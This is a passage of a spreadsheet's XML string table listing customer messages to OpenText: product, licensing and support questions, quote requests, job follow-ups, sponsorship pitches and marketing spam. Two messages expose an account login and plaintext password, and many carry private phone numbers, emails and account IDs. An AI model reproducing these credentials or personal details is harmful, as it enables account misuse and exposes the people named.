Mikkel Thordal Andersen</t>
  </si>
  <si>
    <t>Hi,_x000D_
 _x000D_
Do you look forward for some out of the box web design? _x000D_
_x000D_
We can help you with our amazing web design service under very economic price. _x000D_
_x000D_
Get in touch with us to explore more about our web design services._x000D_
_x000D_
Thanks_x000D_
Maria | Whatsapp: +91 9212464161</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We can promote your website on google by doing SEO of your website at a very low cost of just $99 per month onwards. _x000D_
 _x000D_
If you would like to know more about this, please send a quick email to us._x000D_
_x000D_
Best_x000D_
Shalu| Skype: ranksindia_x000D_
Cell/ Whatsapp: +91 9212464161</t>
  </si>
  <si>
    <t xml:space="preserve">Mobile version constantly crashes on my iPhone with the new iOS12 update. When it does work, it crawls at a snails pace. </t>
  </si>
  <si>
    <t xml:space="preserve">called mail_x000D_
SKIMMING france 〜 africa_x000D_
about 5年日記 5y diary_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Could I please be provided a formal quote in AUD for:_x000D_
 -DF210 – Building an Investigation with EnCase Forensic - ON DEMAND_x000D_
_x000D_
Thanks._x000D_
_x000D_
Regards, _x000D_
_x000D_
Thomas</t>
  </si>
  <si>
    <t xml:space="preserve">I'm trying to get registered as admin for The City of Eugene account, EU0276348. I've been working with Jimmy Beasley, prior contact. He has instructions that I need to register a support account, but there's nowhere to enter our ID (instructions say System ID: End Use Code field). I just need to be linked to the account and modified to account admin. </t>
  </si>
  <si>
    <t xml:space="preserve">We have Liquid Office HP Process Automation 7.5.1 (Build 15599). All of our process files are stored as xpd files. I tried opening them using the Java Web Start launcher, only I'm getting an error that my JNLP file is missing. Can you help? </t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I'm looking for the TCO of OpenText Content Server for submiting a Request for Proposal. _x000D_
Could you please provide it to me by tomorrow, friday, october 12th?_x000D_
_x000D_
Thank you_x000D_
_x000D_
Lucien Koty</t>
  </si>
  <si>
    <t>I currently have HostExplorer 14.  If there is a newer version I would like to try a trail copy.</t>
  </si>
  <si>
    <t>We are soon going public and must become Sarbanes-Oxley compliant (SOX). We have several of you products such as VIP Docmanager and Docview. Right now we are just using the products to work with AS400 output. We'd like to hear how we use your product for the SOX compliance. Thank you.</t>
  </si>
  <si>
    <t>I have been billed each of the last two months but I don't know that I have any connection with your company.  Please have someone call me at the bus phone above or my cell phone 801-390-3870  this is a second request as no one called me after 1st request</t>
  </si>
  <si>
    <t xml:space="preserve">We are working in collaboration with the Detroit Regional Chamber (DRC) to create a Mobility Database of innovative companies in Southeast Michigan.  The purpose of this database is to educate companies and individuals globally on the innovative and successful work being done in the area, while increasing collaboration, business development and overall awareness.  Opentext has been selected to be a part of this online database hosted by the DRC, along with several OEMs and other suppliers with a significant mobility presence in the area.   A portion of this online database includes a directory of individuals best suited to represent each company’s mobility commitment in Southeast Michigan.  This will help the DRC with industry matchmaking, guiding opportunities and queries Opentext’s way, and ensure Opentext is best represented in the database. _x000D_
_x000D_
Please consider helping us with a brief internal introduction to the person you would believe would be best suited be featured in the database (a point of contact for Opentext’s mobility products or services).  We will reach out to that person to verify their info is correct, seek their permission to be identified in the publication, and ensure the company profile best represents Opentext interest overall.  _x000D_
 _x000D_
Your timely support is greatly appreciated and will benefit both Opentext and Southeast Michigan.  Thank you!_x000D_
</t>
  </si>
  <si>
    <t>There appears to be an issue with the training registration. When I click on "checkout," I get the message "Server Error in '/' Application." This happens in both Edge and Chrome.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear ladies and gentlemen,_x000D_
I have applied 3 days ago at your company for two open positions as Senior Project Manager in the Munich office. The applications were based on a referral by a friend of mine who is an employee of OpenText. I have used the link provided in the e-mail I have received based on the referral. In the application form I have completed all fields except of the last section "Optional EEO information". After submitting the form I received a success message. Nevertheless today I received another e-mail reminding me to complete the application. I have repeated the process and again got a success message. Now I am not sure if the process worked or failed. Could you please check this and tell me if I have to submit my application in another way?_x000D_
Thank you very much and best regards_x000D_
Jochen Sauter_x000D_
</t>
  </si>
  <si>
    <t>My office phone line has been receiving a Fax from a "+10000007777" number. the fax is water marked "This is a test output" it has my office number of 585.756.3120 on it. _x000D_
_x000D_
At the very top of the fax is " -*- Demonstration Powered by OpenText Exstream 10/11/2018, Version 9.0.115 64bit (DBCS) -*-" ._x000D_
_x000D_
I have spoke to customer service twice already and was promised this would be taken care of. I do not wish to continue to get these faxes. they are 15 to 30+ times per day and I am unable to block the inbound transmission. _x000D_
_x000D_
If this is not resolved I will be filing a complaint with the FCC._x000D_
_x000D_
Please feel free to contact me at 585-478-6752 if there is any other information I can provide that would help this get resolved. _x000D_
_x000D_
Please confirm receipt. _x000D_
_x000D_
Best Regards,_x000D_
_x000D_
Jared Kierecki_x000D_
Keller Williams Realty Greater Rochester</t>
  </si>
  <si>
    <t>Hi, if we don't renew support agrement, will rightfax continue to work ?_x000D_
_x000D_
thanks</t>
  </si>
  <si>
    <t>Could you please grant me access to the knowledge base portal and download portals. Thnaks, Venkat</t>
  </si>
  <si>
    <t>I need to talk or email someone regarding past due invoices in the amount of $15,599.30  I need to know if they were received EDI or if I need to retransmit.  Thank you!</t>
  </si>
  <si>
    <t>Is your application that is being used by Honeywell FM&amp;T Windows 10 compatible?</t>
  </si>
  <si>
    <t>I need a quote to pay for our support renewal.</t>
  </si>
  <si>
    <t>Hello, does encase supports acquisition of APFS file system, analyzing and recovering data from .e01 image file of this file system? Thanks in advance.</t>
  </si>
  <si>
    <t>Hello, _x000D_
My name is Laura and I am Vice President of Corporate Relations for Women in Leadership Laurier (WILL). WILL is a student run organization within the Lazaridis School of Business and Economics at Wilfrid Laurier University that provides our members with unique opportunities for professional and personal growth. _x000D_
I am looking for corporate partners and sponsors for the 2018/2019 year, and am hoping you would be interested in supporting our organization. I can email you our Sponsorship Package which will provide you with more information on our club and our mission. _x000D_
If WILL is an organization you would consider sponsoring, or if you know of anyone that would be interested, please contact me at: external@willaurier.org _x000D_
Sincerely, _x000D_
Laura Moss _x000D_
416-303-8636</t>
  </si>
  <si>
    <t>Hello , for budgeting purpose we need to know the cost for Opentext enterprise world.  we found that is going to be on Canada from July 6 to July 11 2019.   Could you please tell us when new prices are going to be released ?   An confirm place and dates of the event_x000D_
_x000D_
Thanks _x000D_
Maria</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I renewed my Encase license (dongleID: V1888730664) but have not received any information regarding my upgrade. Can you please help? I'm not sure who previously registered the product at my company or if they used a different mail._x000D_
_x000D_
Regards_x000D_
/Daniel Bergstran, Certezza</t>
  </si>
  <si>
    <t>Documentum - we are looking for a document management system that is ISO compliant. We need it to be a repository with a full document lifecycle management.</t>
  </si>
  <si>
    <t>I have a customer that uses OpenText that would like to use IBM Cloud Object Storage. Can I speak to someone in alliances or partnerships about a technical integration of OpenText with S3 compatible IBM Cloud Object Storage?</t>
  </si>
  <si>
    <t>URGENT REQUIREMENT FOR QUOTE FROM THE DEPARTMENT OF VETERANS AFFAIRS.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello _x000D_
_x000D_
We are software company from Jordan _x000D_
We work for many years for Form designer to meet the complexity of Arabic Language _x000D_
As you know the OCR in Arabic is still week ( the accuracy not like English )_x000D_
_x000D_
So we work on idea to let the user work on same manner like the paper ( the paper from to be same on computer screen with same design 100% )_x000D_
All form become searchable _x000D_
_x000D_
Give me email so I will send  document about the main feature _x000D_
Also , since this our development any further requirement we can do it _x000D_
_x000D_
Are you interest in any way of cooperation so you can take this benefit for your Arab customer _x000D_
_x000D_
Regard _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Sir,_x000D_
May I have a generic pricing for OpenTest iHub and the licensing usage. I need as well the prerequesite to use your solution._x000D_
We acquired a software with BIRT as BI engine. We would like to optimise that tool to create nice interactive reports that could be view on smartphones, digital tablets or laptops._x000D_
_x000D_
The population that will consult the report is around 1500 persons._x000D_
_x000D_
Thanks in advance for your feedbacks_x000D_
_x000D_
Kind Regards_x000D_
_x000D_
Sebastien Fouquet_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">OTCS Ticket 3979791_x000D_
Is the second line  (570-455-8554) ported yet?_x000D_
Also need to know how to route incoming faxes on that line._x000D_
Thank you_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Since the '90s we are using Teleform 9.1 for checking our multiple choice exams. Nearly 12,000 exams a year._x000D_
At this moment we are investigating what the installation of a second machine will cost._x000D_
_x000D_
My question to you is :_x000D_
what are currently the costs for a stand-alone version of  Teleform. _x000D_
Which also can be bound to our MS access application._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
 _x000D_
I am currently evaluating solution options for retiring legacy applications and retaining regulatory data for the organisation. _x000D_
 _x000D_
OpenText InfoArchive seems to be fitting COTS offering. It would be great if I could gain some insight into functional capabilities in order to be able to consider this further. _x000D_
</t>
  </si>
  <si>
    <t>Our company has construction and farming equipment and would like to know how we can utilize the technology used by JCB LiveLink to install in all our equipment. Please advise. Thank you</t>
  </si>
  <si>
    <t>PW</t>
  </si>
  <si>
    <t>Перезвоните пожалуйста по телефону +7 (495) 248-01-88	Чокина Евгения Васильевна</t>
  </si>
  <si>
    <t>Hi_x000D_
I tried to contact Shelley Clark at 'shelleyc@opentext.com', but I got an undeliverable message from email server._x000D_
At Chiquita, we're looking to upgrade our tools and wanted to have your advice._x000D_
Please tell us what you need to know from our installation in order to proceed._x000D_
This is the information I have for now. Let me know what else you need for you to proceed and do this upgrade._x000D_
Software:            eDocs _x000D_
Vendor:                OpenText_x000D_
Contract #:          0012056427_x000D_
Thanks,</t>
  </si>
  <si>
    <t xml:space="preserve">Regarding user id updation to login to knowledge center as the person left the organization and the user id (mail box) not having access. when we tried to raise opentext ticket, it is asking for the verification and sent to the user id which we are not using now. So, user id needs to update with different user id. _x000D_
Below are the credentials using now to login to Opentext knowledge center_x000D_
Rene.Bosch1@ey.com_x000D_
SDP!opentext!2308_x000D_
_x000D_
Please reach out to me for further discussion on the mail id: Muddana.Ramakrishna@ey.com _x000D_
and the mobile number: 91-9071308946._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello OpenText,_x000D_
_x000D_
Currently we are using the below credentials to login to OpenText Knwoledge Center_x000D_
_x000D_
Rene.Bosch1@ey.com_x000D_
SDP!opentext!2308_x000D_
_x000D_
But the person who is having this mail id left the organization and it is not a valid one now._x000D_
We are able to access the knowledge center. But the problem is whenever we tried to raise any ticket, it is asking for email verification required and the mail triggering to the above mail id mentioned and the mail box is not accessible now._x000D_
_x000D_
So, can you please let us know how to update the mail id mentioned above with different mail id._x000D_
_x000D_
Regards,_x000D_
Ramakrishna,_x000D_
91-9071308946._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We are a construction company in the field of OIl &amp; Gas Industry. We are looking for a Document Management System for general purpose use in the company and also for our Engineering department which processes tons of drawings for each project. </t>
  </si>
  <si>
    <t>From: Burgess, Simon _x000D_
Sent: 16 August 2018 18:09_x000D_
To: 'Steven Coleman' &lt;colemans@opentext.com&gt;; Carr, Jeff &lt;jeff.carr@gilbarco.com&gt;_x000D_
Cc: 'Mohan Sharma' &lt;mohans@opentext.com&gt;_x000D_
Subject: RE: StreamServe_x000D_
_x000D_
Hi Steve_x000D_
_x000D_
Any update?_x000D_
_x000D_
We need to get this looked at asap._x000D_
_x000D_
Have heard whether we have a support contract yet?_x000D_
_x000D_
Are you able to get us from version 4 to 16?_x000D_
_x000D_
What kind of work is required?_x000D_
_x000D_
We need to get this to OS 2012 minimum._x000D_
_x000D_
Does Streamserve product version 16 support our version of MFG?_x000D_
_x000D_
Kind Regards_x000D_
Simon_x000D_
_x000D_
From: Burgess, Simon _x000D_
Sent: 01 August 2018 16:28_x000D_
To: 'Steven Coleman' &lt;colemans@opentext.com&gt;; Carr, Jeff &lt;jeff.carr@gilbarco.com&gt;_x000D_
Cc: Mohan Sharma &lt;mohans@opentext.com&gt;_x000D_
Subject: RE: StreamServe_x000D_
_x000D_
Simon Burgess_x000D_
Gilbarco Veeder-Root_x000D_
_x000D_
Simon.burgess@gilbarco.com_x000D_
_x000D_
01268507226_x000D_
_x000D_
_x000D_
_x000D_
Kind Regards_x000D_
Simon_x000D_
_x000D_
From: Steven Coleman &lt;colemans@opentext.com&gt; _x000D_
Sent: 01 August 2018 13:35_x000D_
To: Burgess, Simon &lt;Simon.Burgess@gilbarco.com&gt;; Carr, Jeff &lt;jeff.carr@gilbarco.com&gt;_x000D_
Cc: Mohan Sharma &lt;mohans@opentext.com&gt;_x000D_
Subject: RE: StreamServe_x000D_
_x000D_
Hi Simon, _x000D_
_x000D_
Let’s go for 4pm – I will send an invite. _x000D_
_x000D_
Best Regards_x000D_
Steve _x000D_
_x000D_
From: Burgess, Simon &lt;Simon.Burgess@gilbarco.com&gt; _x000D_
Sent: 01 August 2018 13:29_x000D_
To: Steven Coleman &lt;colemans@opentext.com&gt;; Carr, Jeff &lt;jeff.carr@gilbarco.com&gt;_x000D_
Cc: Mohan Sharma &lt;mohans@opentext.com&gt;_x000D_
Subject: [EXTERNAL] - RE: StreamServe_x000D_
_x000D_
Hi Steven_x000D_
_x000D_
That’s great, im free now, for a call, but 4pm would be better. Today. thanks_x000D_
_x000D_
Kind Regards_x000D_
Simon_x000D_
_x000D_
From: Steven Coleman &lt;colemans@opentext.com&gt; _x000D_
Sent: 01 August 2018 13:18_x000D_
To: Burgess, Simon &lt;Simon.Burgess@gilbarco.com&gt;; Carr, Jeff &lt;jeff.carr@gilbarco.com&gt;_x000D_
Cc: Mohan Sharma &lt;mohans@opentext.com&gt;_x000D_
Subject: RE: StreamServe_x000D_
_x000D_
Hi Simon, _x000D_
_x000D_
We can assist with moving the service over to the new OS. Are you free for a call? _x000D_
_x000D_
We are free 4.00-4.30 today, tomorrow 11.00-12.00 or after 3.30pm. Does any of these times work for you? _x000D_
_x000D_
Best Regards_x000D_
Steve _x000D_
_x000D_
_x000D_
From: Burge</t>
  </si>
  <si>
    <t>Buongiorno_x000D_
_x000D_
mi chiamo Andrea Modena e lavoro per AlteaUp società gold partner SAP._x000D_
Un nostro importante cliente sito in Milano, vorrebbe cogliere l'opportunità data dalla fatturazione elettronica per introdurre maggior efficenza nel processo di ciclo passivo._x000D_
I requisiti da noi raccolti corrispondono alle funzionalità di VIM._x000D_
Abbiamo bisogno nel breve termine di una stima del progetto di implementazione VIM e successivamente vorremmo valutare una partnership per la realizzazione del progetto._x000D_
_x000D_
Vi ringrazio in anticipo_x000D_
Cordiali Saluti_x000D_
Andrea Modena</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I have a request from one of my clients from Law Enforcement Romania about EnCase Forensic. Can we start a contractual discussion about it?_x000D_
_x000D_
Thanks,_x000D_
Sebastian D.</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren_x000D_
Könnten mitteilen, wie die Lizenzbestimmungen sind bezüglich "OpenText Gupta Report Builder 6.3"? - Wir möchten das Tool in unserer virtuellen Umgebung einsetzen und bräuchten die Info, wie wir es lizenzieren müssen und was es kosten würde._x000D_
_x000D_
Besten Dank und freundliche Grüsse_x000D_
Christiane Viatte_x000D_
Informatik Kromer Print AG, Lenzburg</t>
  </si>
  <si>
    <t>We are in receipt of Check No. 2000029784 in the amount of $179.92 received 09/21/2018; unfortunately we are unable to determine the account numbers to apply the payment. Please provide the account numbers and or copy of invoice/statement so we may apply accordingly. If you have any questions, please don’t hesitate to contact me.</t>
  </si>
  <si>
    <t>We need a document control server to exchange document with a customer for a project.</t>
  </si>
  <si>
    <t>Dear Sir/Madame,_x000D_
_x000D_
We have purchased via Grivas SA based in Athens, Greece a dongle licence for EnCase Forensic software, we would like to know the exact procedure regarding the activation of the license. In addition we would like to know how we can download the software._x000D_
_x000D_
Thanks in advance.</t>
  </si>
  <si>
    <t xml:space="preserve">Hej,_x000D_
_x000D_
här kommer lite information om våra nya kontaktuppgifter:_x000D_
_x000D_
Nya Kontaktuppgifter Tre:_x000D_
_x000D_
Besöksadress: Entrétorget 5, 12118, Johanneshov_x000D_
Postadress: Hi3G Access AB, Box 7012, 12107 Stockholm-Globen_x000D_
Leveransadress (bud och leveranser till Tre:s huvudkontor):  Hi3G Access AB, Pastellvägen 2, 12136 Johanneshov_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I cannot have permission to create or view my support ticket in OpenText portal since changed my email address from HPE to DXC. Would you please help me to solve this access issue ASAP? Thanks a lot!</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
 _x000D_
Ahold Delhaize are licensed to use your SAP VIM 7.5 product. We are looking to apply patches soon but my access to the "MySupport" part of your site is not granted, I have went through the request access process via my OpenText logon (Brian.McQuillan@aholddelhaize.com) but access is still not possible. Can you please confirm how I get access as I need to download the support packages and documentation. _x000D_
_x000D_
My colleague Marek Volek already has access but I also need to be able to view the VIM support package documentation and download the patches for our VIM 7.5 &amp; ICC server products._x000D_
_x000D_
Regards,_x000D_
_x000D_
Brian McQuillan._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>how to use right fax for my business</t>
  </si>
  <si>
    <t>Looking for download "process designer" case 360 MS Visio. but dont find it?</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
we are trying to find the secure file achieving system for our eTMF which will be transferred from CRO, the achieving system needs meeting certified and meets the regulatory requirements._x000D_
I am out of US and email would be better to reach me as well._x000D_
Thanks,_x000D_
Jenny_x000D_
</t>
  </si>
  <si>
    <t>Hi! _x000D_
I have ended my employment at Evry (ann-sofie.noren@evry.com) and are now working as a StreamServe consultant at iStone (ann-sofie.noren@istone.com). I´m keeping all my old customers. When I changed my e-mail on your contact site, I don´t have access OpenText StreamServe site. Can you please send me an new password that can be used with my new email-adress (ann-sofie.noren@istone.com).</t>
  </si>
  <si>
    <t>request quotation</t>
  </si>
  <si>
    <t>Which version of IRM Client for PDF is compatible with Adobe Acrobat reader DC 2019.008.20074? _x000D_
We have tested IRM Version 5.1.2025, it prompts IRM Client for PDF cannot run with this version of Acrobat. Please check with opentext for a newer version of the IRM Client for PDF plug-in. _x000D_
_x000D_
Awaiting for your earliest reply. Thank you</t>
  </si>
  <si>
    <t>Get quotes.</t>
  </si>
  <si>
    <t>Evaluating an Analytics and Pixel perfect reporting tool</t>
  </si>
  <si>
    <t>We are looking for a Business Analytics Tool.  I was looking at BIRT specifically. As far as I undertsand, BIRT is now part of OpenText product suite. Can you please suggest the licensing for BIRT.  Or if  you have any other such product ?</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to register my new Encase dongle and I created a new account (dominicusa@ocbc.com) but I always get same message "our records indicate that you have registered for access to My Support but have not yet confirmed your email with us" even though I have confirmed my email address few times. Can you help me on this please? FYI, OpenText Sales Order Number: 10425691 - Bounga Informatics Pte Ltd_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We have connection problem when we try to connect remote server (RHEL 7.1) by using EoD (v13.8)._x000D_
I think there is compatibility problem._x000D_
_x000D_
What should I do to resolve this problem?</t>
  </si>
  <si>
    <t>Do you have representative office or technical personnel in Jakarta, Indonesia?_x000D_
We would like to know more Rightfax solution._x000D_
Thanks</t>
  </si>
  <si>
    <t>Hi. I'd like to know if OpenText Exceed is Windows 10 compatible. Thank you</t>
  </si>
  <si>
    <t>Looking for more info on first class and cost</t>
  </si>
  <si>
    <t>Necessito da montagem de um ambiente de desenvolvimento utilizando a ferramenta Vignette/Open Text (WEM 8.1). Estava em  contato com o sr. Mauricio Gioia mas o mesmo não deu andamento._x000D_
Quem poderia me ajudar.</t>
  </si>
  <si>
    <t>how can i get cordys user manual in PDF format _x000D_
please reply as soon as possible_x000D_
regards_x000D_
Rishit Shah</t>
  </si>
  <si>
    <t>We are going to be testing with Stage Stores. They are requiring us to use the GXS catalogue. I would like to know how Navajo can be subscribed,the cost of a subscription and what I would need to do to get Navajo set up.</t>
  </si>
  <si>
    <t>I am trying to recover the password of the page for the user soporte.basis@mqa-bc-com, but there is no password recovery email._x000D_
I request your support by changing the email address to william.marin@mqa-bc.com, since the previous account is inactive._x000D_
_x000D_
Best regards._x000D_
WIlliam Marin_x000D_
MQA Business Consultants.</t>
  </si>
  <si>
    <t>Encase forensic product pricing</t>
  </si>
  <si>
    <t>MIR TOHASIN  9437958314_x000D_
mirtahasin3312@gmail.com</t>
  </si>
  <si>
    <t>Seeking document management (Documentum) solution</t>
  </si>
  <si>
    <t>I am trying to recover the password of the page for the user soporte.basis@mqa-bc.com, but there is no password recovery email._x000D_
_x000D_
best regards._x000D_
_x000D_
Javier Gonzalez</t>
  </si>
  <si>
    <t>Accounts Payable department needs your latest w9 to continue to pay invoices. Please send me the current w9 ASAP._x000D_
Thanks,_x000D_
Rob</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
  I was a member of exstreamdialogue forum before it was merged with Opentext and _x000D_
 I also registered in opentext. Now I can able login in but couldn't find HP Exstream forum in OpenText. Can you please help me with that._x000D_
_x000D_
Thank you,_x000D_
Ramasamy _x000D_
 </t>
  </si>
  <si>
    <t xml:space="preserve">BI &amp; Analytics Solutions are one of your specialties, we have a record’s of client’s how is actually seeking for a vendor change for their BI &amp; Analytics solution._x000D_
_x000D_
Each records in the list contains: Contact name, Company name, Job Title, Website, Industry, SIC Code, Email address, Direct mail address, Telephone number, Revenue Size, Employee Size, etc._x000D_
_x000D_
If you are interested, Please let me know your thoughts, so that I can send you the Pricing, Counts and Samples on the same!_x000D_
_x000D_
I look forward to hear from you!_x000D_
</t>
  </si>
  <si>
    <t>Estou procurando empresas com solução para automatizar o envio e recebimento dos arquivos bancários.Atualmente trabalhamos com Bradesco, Brasil, Santander e, estamos terminando as configurações com o Safra.</t>
  </si>
  <si>
    <t>Any plans for offering the following course in the US. for late 2018 or early  2019_x000D_
4-8022 DFC (Documentum Foundation Classes) Programming v7.1_x000D_
_x000D_
If its held in UK how easy would it be to attend the Virtual Classroom _x000D_
scheduled_x000D_
Feb 11, 2019 	On-site 	4-8022 	English 	Virtual Classroom - UK	2,750.00 	Add to Cart _x000D_
_x000D_
Would I be able to attend from US Boston with just a computer?_x000D_
_x000D_
Thanks, Mike</t>
  </si>
  <si>
    <t xml:space="preserve">I am a Systems Engineer who works for DellEMC working with accounts in the Pacific Northwest.  I have a customer in Montana who wants to meet with the OpenText Sales and Engineering teams to review InfoArchive.  I need to know who covers accounts in Montana and who can handle this request.  Please reach out to me via e-mail or phone._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I attempted to reach out to 'arassist@opentext.com' and 'rharris@opentext.com' to verify your supplier information.  But have not heard a response.  We are determining if we need to continue service and we are doing vendor maintenance.  </t>
  </si>
  <si>
    <t xml:space="preserve">Requesting RightFax integration guide with Cisco Call Manager version 11.5.1 using SIP trunk.  </t>
  </si>
  <si>
    <t>Hello,_x000D_
I would need to have access to your support. My account is created but I do not have access to 'my support'. I do not have the information for the customer id, I replace someone who left and did not provide the information._x000D_
Can you give me access to your support? I would like to follow up on an open ticket at opentext OTCS Ticket 3363471 Gateway 14._x000D_
Thank you and good day</t>
  </si>
  <si>
    <t xml:space="preserve">Need to get in contact for a few items. Access to download versions of Encase Forensic software and get quotes on updating sms license. </t>
  </si>
  <si>
    <t>I changed my email address and now I don't have permissions to do anything, including edit my account info.</t>
  </si>
  <si>
    <t>Good Afternoon,_x000D_
_x000D_
I was wondering if it would be possible to be provided with an updated Technical Alert for Issue WX-10960, involving the Microsoft security updates causing fingerprints generated on the ApplicationXtender License Server to be logged as invalid._x000D_
_x000D_
We have had multiple clients experience this issue and now with additional security updates these issues are arising again. Just this morning we had a client have the same problem with the following Microsoft updates: KB4462926, KB4462949, and KB4462941._x000D_
_x000D_
Would you be able to provide us with an updated Technical Alert regarding this issue that we may use to provide any clients that are encountering this issue?_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Taylor Treece_x000D_
CASO Document Management, Inc. | IT Solutions Engineer_x000D_
taylor.treece@caso.com_x000D_
3453 Interstate 35 North, Suite 215_x000D_
San Antonio, TX 78219</t>
  </si>
  <si>
    <t>We currently utilize 4 channels in RightFax for incoming faxes. We would like to add 2 channels and dedicate those for outgoing faxes. Could you provide a quote for these additional channels?</t>
  </si>
  <si>
    <t>Hello, I'd like to get a mailbox ID for Natico originals. Thank you! Jennifer</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for a quote for a customer for their Cisco phone environment. </t>
  </si>
  <si>
    <t>_x000D_
Hello, my name is Danilo!_x000D_
_x000D_
I'm looking for a tool that captures personal documents, to replace the tool we currently use in our "Account Opening" application._x000D_
_x000D_
Can you send an email with more information about the tool: "OpenText Captiva Mobile Capture"_x000D_
_x000D_
Do you have a trial version to check?_x000D_
_x000D_
Thank you!_x000D_
Danilo Caliman</t>
  </si>
  <si>
    <t>Our account number is US01-103233. Whom should we contact to discuss the termination of the contact? Thanks.</t>
  </si>
  <si>
    <t>Hello, I have reached out multiple times to receive an updated W-9 so we can pay out invoices. Please send it to mishhcc@hhcc.com.</t>
  </si>
  <si>
    <t>GN</t>
  </si>
  <si>
    <t>Ongoing support for Accell Unify running on AIX 6</t>
  </si>
  <si>
    <t>I am reaching out on behalf of the BSides Ottawa 2018 organizing committee to touch base in regard to opentext's potential sponsorship of this years conference. Our previous contact was Bryan McCaffrey a few years back. _x000D_
_x000D_
We still have several sponsorship packages available and would love to have your support to ensure that our largest and most highly anticipated event to-date becomes a resounding success. It is going to be an incredible event filled with speakers, tracks, career fair, hacker high school, CTF and IOT village. _x000D_
_x000D_
Please let me know if you'd like to schedule a call with a member of our team to go over details together. Thank you in advance for your consideration and I look forward to hearing from you in regard to the above._x000D_
_x000D_
Kindest regards,_x000D_
Alex</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, we'd like to get information about Exstream Content Author. </t>
  </si>
  <si>
    <t>I am very interested in OpenText Teleform. I have handwritten signup forms that I want to be automatically read and input into a csv format. I would like more information on this product please. Thank you.</t>
  </si>
  <si>
    <t>I am contacting you as we are interesting in implementing captiva to the company as we are looking for an opportunity to digitalise our documents - we are fast-growing company which we would like to modernizate._x000D_
_x000D_
Could you please contact me as soon as possible(possibly till Friday) or at least send your quote/offer?_x000D_
_x000D_
Thank you in advance,_x000D_
Joanna Jóźkowicz</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for Documentum sales </t>
  </si>
  <si>
    <t>I would like to inquire when the last time our accounts payable department submitted any invoices to be uploaded to the Alchemy database.</t>
  </si>
  <si>
    <t>I’m a journalist at a publication called The Logic, which covers the innovation economy in Canada. We’re working on an article about the Scientific Research and Experimental Development (SR&amp;ED) tax incentive program and how it’s used by companies in Canada._x000D_
_x000D_
Below are a few questions on if and how OpenText uses the SR&amp;ED program. My deadline is noon Friday. _x000D_
_x000D_
1. Does OpenText claim, or has it claimed in the past, SR&amp;ED credits for any of its R&amp;D work? _x000D_
_x000D_
2. Does OpenText track the intellectual property that is generated from SR&amp;ED-eligible R&amp;D activity? If so, how much of that IP is based in Canada?_x000D_
_x000D_
We’ve received a document via an Access to Information and Privacy request on the Digital Industries Economic Strategy Table from last November, which includes a survey of technology leaders in Canada and their recommendations for SR&amp;ED. Interviewees noted a number of issues with the program. One critique was that: “Currently companies are structuring their research activities to maximize SR&amp;ED versus structuring their research activities to maximize innovation and growth”_x000D_
_x000D_
3. Can you comment on whether OpenText does in fact structure its research activities to maximize SR&amp;ED credits? _x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>Request to update Open Text Imagenation to latest version</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
My name is Gracie Brown, would you be interested in purchasing our updated and permission based Records and Information Management Industry Decision Makers Email List across USA, Canada &amp; Australia. _x000D_
_x000D_
In our list every lead includes: Contact Name, Job title, Company name, Website, Physical address, City, State, Country, Phone Number, Industry vertical &amp; Opt-in E-mail address._x000D_
_x000D_
I’d be happy to send over few Sample data for your reference and please let me know would you like reach the below mentioned target market criteria? _x000D_
_x000D_
•	Records Manager/Analyst/Technician_x000D_
•	Information Management Manager/Director_x000D_
•	Information System Engineer/Manager_x000D_
•	Information Security Manager/Director_x000D_
•	Data Management Manager/Analyst_x000D_
•	Data Center Owner/Manager_x000D_
•	RIM and IG Management Manager/Director_x000D_
•	RIM and IG Consultant_x000D_
•	Privacy, FOI and ATIP Officer/Manager_x000D_
•	BPM Manager/Director_x000D_
•	SharePoint User/Manager_x000D_
•	IT Engineer/Manager_x000D_
•	Project Manager/Director_x000D_
•	Operation Manager/Director_x000D_
_x000D_
Else, please fill your specific target market criteria in the below mentioned format, So that I can run counts and get back to you with samples, benefits and more information for your review._x000D_
_x000D_
Target Job title: _________ Target Industry: ______________   Target Geography: _____________ _x000D_
_x000D_
Thank you so much for reading my mail even in your busy schedule._x000D_
_x000D_
Best Regards,_x000D_
_x000D_
Gracie Brown_x000D_
Business Development Coordinator_x000D_
US Data - Email Append - Data Append - Technology Specific Data - Email Marketing._x000D_
Email: gracie.br@chief-exhibitus.com_x000D_
_________________________________________x000D_
If you no longer wish to hear from us please reply me with the subject line: "Opt Out"._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We are a managed service providor and looking at your Fax solution to sell to our customers.  I have one right now that has 100 employees and 11 MFP's that they use to fax.  Would like your solution to fix their issues. </t>
  </si>
  <si>
    <t>I would like to know if you have a product which will view HP ME10 .mi files and convert them to dxf? If so, how much that would cost. Many thanks</t>
  </si>
  <si>
    <t>I recieved an email from Smriti Caprihan regarding a phone interview._x000D_
The position was Customer Support Renewals Specialist, Job ID 20300._x000D_
_x000D_
Since September 21st, I didn't heard back from her....._x000D_
_x000D_
Please call me .....</t>
  </si>
  <si>
